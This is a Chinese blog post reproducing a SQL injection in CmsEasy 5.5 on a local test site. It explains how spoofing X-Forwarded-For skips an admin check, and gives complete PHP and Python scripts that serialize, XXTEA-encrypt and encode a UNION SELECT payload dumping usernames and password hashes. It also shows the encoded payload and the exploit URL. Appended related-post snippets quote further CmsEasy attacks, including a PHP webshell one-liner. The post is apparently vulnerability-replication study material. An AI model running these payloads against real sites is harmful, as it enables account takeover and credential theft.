cmseasy_5.5-SQL注入漏洞复现

已于 2024-08-13 09:57:48 修改
阅读量681 收藏 29
点赞数 17
文章标签: 网络安全 web安全 数据库
于 2024-08-12 01:52:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68533808/article/details/141114490
版权

目录

一、目的

二、原因

1、为什么可以未授权登录

 2、为什么拿到Cookie安全码后,可以进入数据库获取账号密码

三、过程(节省时间,环境已搭好)

 1、注册过后登录进去找到Cookie安全码所在位置

2、编写注入脚本进行注入

 3、进行破解

一、目的

以未授权方式拿到Cookie安全码,并通过Cookie安全码拿到数据库中的账号和密码

二、原因

注:此网站模板是开源的所以可以看到一些后台代码

1、为什么可以未授权登录

由于后代码问题,如图所示servip=front ip且get=1就会return,即我们需要满足两个条件就可以跳过admin验证:

  • servip=客户端IP
  • get传参=1

 2、为什么拿到Cookie安全码后,可以进入数据库获取账号密码

由下面三幅图可知,Cookie安全码编码,加密,反序列化后就可以用getrow函数去使用数据库了

三、过程(节省时间,环境已搭好)

 1、注册过后登录进去找到Cookie安全码所在位置

127.0.0.1/index.php?case=config&act=system&set=site&admin_dir=admin&site=default

在火狐上下载X-Forwarded-For Header插件 

 

进入后拿去 Cookie安全码

79395616c9962f8f8134348d7cf003ff

2、编写注入脚本进行注入
<?php

$key = '79395616c9962f8f8134348d7cf003ff';

$table = array(
    'userid`=-1 union select 1,concat(username,0x23,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from cmseasy_user limit 0,1#'=>1
);

echo base64_encode(xxtea_encrypt(serialize($table), $key));

function xxtea_encrypt($str, $key) {
    if ($str == "") {
        return "";
    }
    $v = str2long($str, true);
    $k = str2long($key, false);
    if (count($k) < 4) {
        for ($i = count($k); $i < 4; $i++) {
            $k[$i] = 0;
        }
    }
    $n = count($v) - 1;

    $z = $v[$n];
    $y = $v[0];
    $delta = 0x9E3779B9;
    $q = floor(6 + 52 / ($n + 1));
    $sum = 0;
    while (0 < $q--) {
        $sum = int32($sum + $delta);
        $e = $sum >> 2 & 3;
        for ($p = 0; $p < $n; $p++) {
            $y = $v[$p + 1];
            $mx = int32((($z >> 5 & 0x07ffffff) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
            $z = $v[$p] = int32($v[$p] + $mx);
        }
        $y = $v[0];
        $mx = int32((($z >> 5 & 0x07ffffff) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
        $z = $v[$n] = int32($v[$n] + $mx);
    }
    return long2str($v, false);
}

function xxtea_decrypt($str, $key) {
    if ($str == "") {
        return "";
    }
    $v = str2long($str, false);
    $k = str2long($key, false);
    if (count($k) < 4) {
        for ($i = count($k); $i < 4; $i++) {
            $k[$i] = 0;
        }
    }
    $n = count($v) - 1;

    $z = $v[$n];
    $y = $v[0];
    $delta = 0x9E3779B9;
    $q = floor(6 + 52 / ($n + 1));
    $sum = int32($q * $delta);
    while ($sum != 0) {
        $e = $sum >> 2 & 3;
        for ($p = $n; $p > 0; $p--) {
            $z = $v[$p - 1];
            $mx = int32((($z >> 5 & 0x07ffffff) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
            $y = $v[$p] = int32($v[$p] - $mx);
        }
        $z = $v[$n];
        $mx = int32((($z >> 5 & 0x07ffffff) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
        $y = $v[0] = int32($v[0] - $mx);
        $sum = int32($sum - $delta);
    }
    return long2str($v, true);
}

function long2str($v, $w) {
    $len = count($v);
    $n = ($len - 1) << 2;
    if ($w) {
        $m = $v[$len - 1];
        if (($m < $n - 3) || ($m > $n)) return false;
        $n = $m;
    }
    $s = array();
    for ($i = 0; $i < $len; $i++) {
        $s[$i] = pack("V", $v[$i]);
    }
    if ($w) {
        return substr(join('', $s), 0, $n);
    }
    else {
        return join('', $s);
    }
}

function str2long($s, $w) {
    $v = unpack("V*", $s. str_repeat("\0", (4 - strlen($s) % 4) & 3));
    $v = array_values($v);
    if ($w) {
        $v[count($v)] = strlen($s);
    }
    return $v;
}

function int32($n) {
    while ($n >= 2147483648) $n -= 4294967296;
    while ($n <= -2147483649) $n += 4294967296;
    return (int)$n;
}
#python脚本
import base64
import struct

class SQLiPayload():
    def __init__(self,key):
        self.php_key = "userid`=-1 union select 1,concat(username,0x23,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from cmseasy_user limit 0,1#"
        self.php_value = 1
        self.key = key

    def create_php_serialized_string(self):
        # 序列化
        key_serialized = f"s:{len(self.php_key)}:\"{self.php_key}\""
        value_serialized = f"i:{self.php_value}"
        # 构造 PHP 风格的序列化字符串
        php_serialized = f"a:1:{{{key_serialized};{value_serialized};}}"
        return php_serialized

    def xxtea_encrypt(self,data, key):
        if not data:
            return ""

        v = self.str2long(data, True)
        k = self.str2long(key, False)

        if len(k) < 4:
            k += [0] * (4 - len(k))
        n = len(v) - 1

        z = v[n]
        y = v[0]
        delta = 0x9E3779B9
        q = int(6 + 52 / (n + 1))
        sum = 0
        while q > 0:
            q -= 1
            sum = self.int32(sum + delta)
            e = (sum >> 2) & 3
            for p in range(n):
                y = v[p + 1]
                mx = self.int32(((z >> 5 & 0x07ffffff) ^ (y << 2)) + ((y >> 3 & 0x1fffffff) ^ (z << 4)) ^ self.int32((sum ^ y) + (k[p & 3 ^ e] ^ z)))
                z = v[p] = self.int32(v[p] + mx)
            y = v[0]
            p += 1

            mx = self.int32(((z >> 5 & 0x07ffffff) ^ (y << 2)) + ((y >> 3 & 0x1fffffff) ^ (z << 4)) ^ self.int32((sum ^ y) + (k[p & 3 ^ e] ^ z)))
            z = v[n] = self.int32(v[n] + mx)


        return self.long2str(v, False)

    def int32(self,n):
        while n >= 2147483648:
            n -= 4294967296
        while n <= -2147483649:
            n += 4294967296
        return n

    def long2str(self,v, w):
        # 将有符号整数转换为无符号32位整数
        v_unsigned = [(x & 0xFFFFFFFF) for x in v]
        # 使用struct模块将整数转换为字节串
        s = b''.join(struct.pack("<I", x) for x in v_unsigned)
        return s


    def str2long(self,s, w):
        v = list(struct.unpack("<" + "I" * ((len(s) + 3) // 4), s.ljust(((len(s) + 3) // 4) * 4, b"\0")))
        if w:
            v.append(len(s))
        return v

    def generate_payload(self):
        serialized_table = self.create_php_serialized_string()
        encrypted = self.xxtea_encrypt(serialized_table.encode(), self.key.encode())
        payload = base64.b64encode(encrypted).decode('utf-8')
        return payload

if __name__ == "__main__":
    key = '79395616c9962f8f8134348d7cf003ff'
    sqli= SQLiPayload(key)
    payload = sqli.generate_payload()
    print(payload)
#注:这个是找的一个大佬的

运行后得到先序列号,然后再加密后然后再编码后的一个值

MV8nVdYGLvIlnVDHk8R7TkBSeKz7pAaqv/+5d9giLOLOEgcFTlnVf/l8enSjwPDiXkIn17L8vE31Q0tXo5hsJqfqRjpn0DU+y7uMl0AB1wDVXH/czLVB029YU90oCBl1pNZ+L6zJ0ZWFvF8JLH+kfmP0lneKMLBFKxn8iwypR9xzWP74AbVlshZSkEs8bXb1BQecTIcREHLhLiBE

注:这里的+和/都需要再次编码,不然会被url识别为空格进行截断,无法正常运行

+变为%2b,/变为%2f

MV8nVdYGLvIlnVDHk8R7TkBSeKz7pAaqv%2f%2b5d9giLOLOEgcFTlnVf%2fl8enSjwPDiXkIn17L8vE31Q0tXo5hsJqfqRjpn0DU%2by7uMl0AB1wDVXH%2fczLVB029YU90oCBl1pNZ%2bL6zJ0ZWFvF8JLH%2bkfmP0lneKMLBFKxn8iwypR9xzWP74AbVlshZSkEs8bXb1BQecTIcREHLhLiBE

 3、进行破解

输入

127.0.0.1/index.php?case=admin&act=remotelogin&admin_dir=admin&site=default&args=MV8nVdYGLvIlnVDHk8R7TkBSeKz7pAaqv%2f%2b5d9giLOLOEgcFTlnVf%2fl8enSjwPDiXkIn17L8vE31Q0tXo5hsJqfqRjpn0DU%2by7uMl0AB1wDVXH%2fczLVB029YU90oCBl1pNZ%2bL6zJ0ZWFvF8JLH%2bkfmP0lneKMLBFKxn8iwypR9xzWP74AbVlshZSkEs8bXb1BQecTIcREHLhLiBE

如下图所示,获取成功

趣喵(╹ڡ╹ )
关注
漏洞复现CmsEasy crossall_act.php SQL注入漏洞
失心少年
07-28 206
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!CmsEasy存在SQL注入漏洞,通过文件service.php加密SQL语句执行即可执行任何SQL命令。文件中得到了$key='cmseasy_sql’和加解密方法,构造请求获取密码md5。代码中构造参数sql,然后使用方法unlockString解码执行SQL语句。
cmseasy漏洞复现
qq_52223347的博客
03-10 4505
介绍 提供可视化编辑企业网站管理系统系统、网站模板、以及相关文档资料下载,网站系统完美运 行PHP7环境中。 官方网站: https://www.cmseasy.cn/ cmseasy_7.3.8 任意文件操作漏洞复现 cmseasy_7.6.3.2逻辑漏洞复现 "无需代码,自由拖拽布局,适应所有设备”是这个系统宣传的特色,后台自然地 存在自定义网站模板功能,这种功能中如果处理不当很可能造成文件任意读、写 或者删除的脆弱性问题,需要着重注意。 一 任意文件操作漏洞复现 进入管理界面–》模块 --》编辑模
cms漏洞系统】cmseasy漏洞复现
网安小白
08-02 252
5.购买成功后查看账户,金额增加说明成功。成功,然后你就可以拿着这笔巨款可以购物了。将环境装到自己的本地网站下。3.选择商品 并且抓包。
WebCmsEasy 漏洞复现
uuzeray的博客
11-25 1342
但p=system('xxx');却不能执行(没有disable_functions)账号密码都是admin admin,不知道为什么,这里就先当作是默认吧。在页面里post传g=phpinfo();(其实都是信息检索,能在网上搜到就行hhh)看到左边列表有模板,心里大概有数了哈。挺奇怪的,可能不是linux系统?进行一波历史漏洞的查。
cmseasy(易通CMS) 注入漏洞 上传漏洞 爆路径ODAY(含修复)
收集盒 Book box
01-03 2717
注入漏洞 注入点:/celive/js/include.php?cmseasylive=1111&departmentid=0 类型: mysql blind—string 错误关键字:online.gif 表名:cmseasy_user 列明:userid,username,password 直接放Havij里面跑。错误关键字:online.gif 添加表名:cmseasy_user
基于phpstudy对cmseasy5.5进行漏洞复现
最新发布
wzzzzz06的博客
08-11 578
还用到了condition()和rec_select_one()函数,而condition()就在getrow()下面,现在要继续追代码rec_select_one()了。将该函数及其内部用到的其他函数一起复制到一个新建的index.php内:str2long(),long2str(),int32()思考:追代码很耗时耗精力,代码审计同样如此,即使是复现漏洞也不敢说完全能看懂,有时候debug能用还是用一下比较好。#字符串内的+,/都要进行unicode编码,其中+为%2d,/为%2f。
CmsEasy crossall_act.php SQL注入漏洞.md
04-08
根据提供的文件信息,CmsEasy的crossall_act.php文件中存在一个SQL注入漏洞,这是在IT行业中常见的安全漏洞类型。SQL注入攻击者可以通过这个漏洞数据库中执行恶意的SQL语句,从而对网站数据库进行非授权的操作。 ...
CmsEasy_UTF-8.rar_CmsEasy_UTF-8_en_PHP 企业网站_企业网站_网站管理
09-20
CmsEasy_UTF-8.rar】是一个压缩包文件,其中包含了一个名为"CmsEasy"的UTF-8编码的中文企业网站管理系统。这个系统是专为建立企业网站而设计的,其核心特性在于其小巧、高效和人性化的操作界面。根据描述,易通...
CmsEasy_5.5_UTF-8_20140605
08-20
安全 内置360安全杀毒脚本 确保企业网站安全运行无忧 效率 涵盖全部企业所需功能 减轻网站管理负担 稳定 历经商业市场考验4年 企业用户超过30万
CmsEasy_5.5_UTF-8_20130716
08-20
开发语言:PHP5.0 数据库:MySQL 5.0 组件:Zend (PHP5.3需 ZendGuardLoader) 系统环境:Window Server 或者Linux 扩展:MySQLi 函数:gzinflate
【代码审计】CmsEasy_v5.7 代码执行漏洞分析
12-02 2881
&#13; &#13; 0x00 环境准备&#13; CmsEasy官网:http://www.cmseasy.cn/&#13; 网站源码版本:CmsEasy_v5.7_UTF8-0208&#13; 程序源码下载:&#13; http://ftp.cmseasy.cn/CmsEasy5.x/CmsEasy_5.7_UTF-8_20180208.zip&#13; 测试网站首页...
CmsEasy_v5.7 代码执行漏洞复现
jie_a的博客
08-16 2422
环境安装这就不多说了,官网自己下载 CmsEasy_v5.7 我下载的6.0也能用。 首先网页长这样 然后在网址后面输入/admin进入后台登陆 登陆后台admin,admin 点击,模板–自定义标签—添加自定义标签–填写Payload—提交: Payload: 1111111111";}<?php phpinfo()?> 提交完要点击预览 附绕代码检测的一句话Payload: 11";}<?php assert($_POST[g]);?> 菜刀连接即可,他们说菜刀能连,我练
CMSEASY逻辑漏洞思路剖析
Ms08067安全实验室
05-13 2425
本周分享知识星球里面的cmseasy逻辑漏洞,里面涉及了抓包教程比较简单,适合新手练习。这次跟大家分享其中的思路。本文作者:付聪(MS08067安全实验室核心)CMSEASY逻辑漏洞一登...
DEDECMS v5.6漏洞复现
_Ralph的博客
01-16 7993
织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类cms系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 闲来无事,复现一下dedecms v5.6版
CmsEasy 5.5 cut_image 代码执行漏洞
acn19249的博客
06-15 796
3 CmsEasy 5.5 cut_image 代码执行漏洞 3.1 摘要 3.1.1 漏洞介绍 CmsEasy是一款基于PHP+MySQL架构的网站内容管理系统,可面向大中型站点提供重量级网站建设解决方案:拥有强大的内容发布模板自定义功能,可以通过模板自定义功能扩展出产品、新闻、招聘、下载等多种不同的内容发布及字段显示功能。可自定义网页标题、关键词、描述、URL路径等多种优化项,可自...
CMS漏洞复现
qq_44832048的博客
07-19 9845
dedeCMS (CNVD-2018-01221) 类型: php类cms系统:dedecms、帝国cms、php168、phpcmscmstop、discuz、phpwind等asp类cms系统:zblog、KingCMS等国外的著名cms系统:joomla、WordPress 、magento、drupal 、mambo。 dedeCMS (CNVD-2018-01221) 漏洞简介...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8459
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值